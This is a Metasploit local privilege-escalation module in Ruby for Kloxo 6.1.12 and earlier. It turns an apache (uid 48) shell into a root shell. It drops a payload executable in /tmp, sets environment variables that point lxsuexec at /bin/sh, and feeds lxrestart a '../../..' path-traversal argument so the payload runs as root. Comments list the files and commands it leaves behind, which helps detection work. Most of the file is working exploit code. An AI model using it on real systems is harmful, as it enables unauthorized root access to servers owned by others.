##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
# Local module for the Kloxo setuid-root helper binaries (lxsuexec and
# lxrestart) referenced as EDB 25406 / OSVDB 93287.
#
# What the code below relies on:
#   * an existing shell session whose uid is 48 (the quoted disassembly in
#     #exploit shows a getuid() result being compared against 48);
#   * the lxsuexec and lxrestart binaries shipped with Kloxo 6.1.12 and
#     earlier, which the module description states are setuid root.
#
# Artifacts this module leaves on a host, useful when reviewing logs or
# building detections:
#   * two files with four-letter alphabetic names written under /tmp (both
#     registered for cleanup, so they may be gone after the session ends);
#   * `lxsuexec` started by uid 48 with a /tmp path as its argument;
#   * `/usr/sbin/lxrestart` invoked with an argument that starts with
#     `../../..` and ends in ` #`.
class Metasploit4 < Msf::Exploit::Local

  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::FileDropper

  include Msf::Exploit::Local::Linux

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata handed in by the framework; it is merged with
  #   the values below through update_info before being passed to super.
  def initialize(info = {})
    module_info = {
      'Name' => 'Kloxo Local Privilege Escalation',
      'Description' => %q{
        Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as
        lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,
        Apache by default on CentOS 5.8, the operating system supported by Kloxo.
        This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'HTP',         # Original PoC according to exploit-db
        'juan vazquez' # Metasploit module
      ],
      'Platform' => ['linux'],
      'Arch' => [ARCH_X86],
      'SessionTypes' => ['shell'],
      'Payload' => {
        'Space' => 8000,
        'DisableNops' => true
      },
      'References' => [
        ['EDB', '25406'],
        ['OSVDB', '93287'],
        # post referencing the vulnerability and PoC
        ['URL', 'http://roothackers.net/showthread.php?tid=92']
      ],
      'Targets' => [
        ['Kloxo 6.1.12', {}]
      ],
      'DefaultOptions' => {
        'PrependSetuid' => true
      },
      'DefaultTarget' => 0,
      'Privileged' => true,
      'DisclosureDate' => "Sep 18 2012"
    }

    super(update_info(info, module_info))
  end

  # Runs the module against the current session.
  #
  # Sequence, exactly as performed below: confirm the session uid is 48,
  # drop the payload executable under /tmp, issue the shell environment
  # commands, drop a one-line helper that calls /usr/sbin/lxrestart, and run
  # that helper through lxsuexec. Both dropped files are registered for
  # cleanup.
  #
  # Aborts through fail_with(Exploit::Failure::NoAccess, ...) when the session
  # uid is anything other than "48".
  def exploit
    # The uid requirement comes from the check quoted by the module author:
    # execution only continues when getuid() returns 48.
    # .text:0804869D call _getuid
    # .text:080486A2 cmp eax, 48
    # .text:080486A5 jz short loc_80486B6 // uid == 48 (typically apache on CentOS)
    # .text:080486A7 mov [ebp+var_A4], 0Ah
    # .text:080486B1 jmp loc_8048B62 // finish if uid != 48
    # .text:08048B62 loc_8048B62: ; CODE XREF: main+39j
    # .text:08048B62 ; main+B0j
    # .text:08048B62 mov eax, [ebp+var_A4]
    # .text:08048B68 add esp, 0ECh
    # .text:08048B6E pop ecx
    # .text:08048B6F pop esi
    # .text:08048B70 pop edi
    # .text:08048B71 pop ebp
    # .text:08048B72 lea esp, [ecx-4]
    # .text:08048B75 retn
    # .text:08048B75 main endp
    print_status("Checking actual uid...")
    current_uid = cmd_exec("id -u")
    unless current_uid == "48"
      fail_with(Exploit::Failure::NoAccess, "You are uid #{current_uid}, you must be uid 48(apache) to exploit this")
    end

    # Drop the generated payload executable in /tmp under a random name.
    payload_exe = generate_payload_exe
    payload_path = "/tmp/#{rand_text_alpha(4)}"
    print_status("Writing payload executable (#{payload_exe.length} bytes) to #{payload_path} ...")
    write_file(payload_path, payload_exe)
    register_file_for_cleanup(payload_path)

    print_status("Exploiting...")
    # Shell commands are issued one at a time and in this order. The exported
    # variables are presumably read by lxsuexec; their meaning is not shown in
    # this file.
    [
      "chmod +x #{payload_path}",
      "LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`",
      "export MUID=$LXLABS",
      "export GID=$LXLABS",
      "export TARGET=/bin/sh",
      "export CHECK_GID=0",
      "export NON_RESIDENT=1"
    ].each { |shell_cmd| cmd_exec(shell_cmd) }

    # One-line helper that calls lxrestart with a relative path resolving to
    # the dropped payload; it is then executed through lxsuexec.
    helper_path = "/tmp/#{rand_text_alpha(4)}"
    write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")
    register_file_for_cleanup(helper_path)
    cmd_exec("lxsuexec #{helper_path}")
  end

end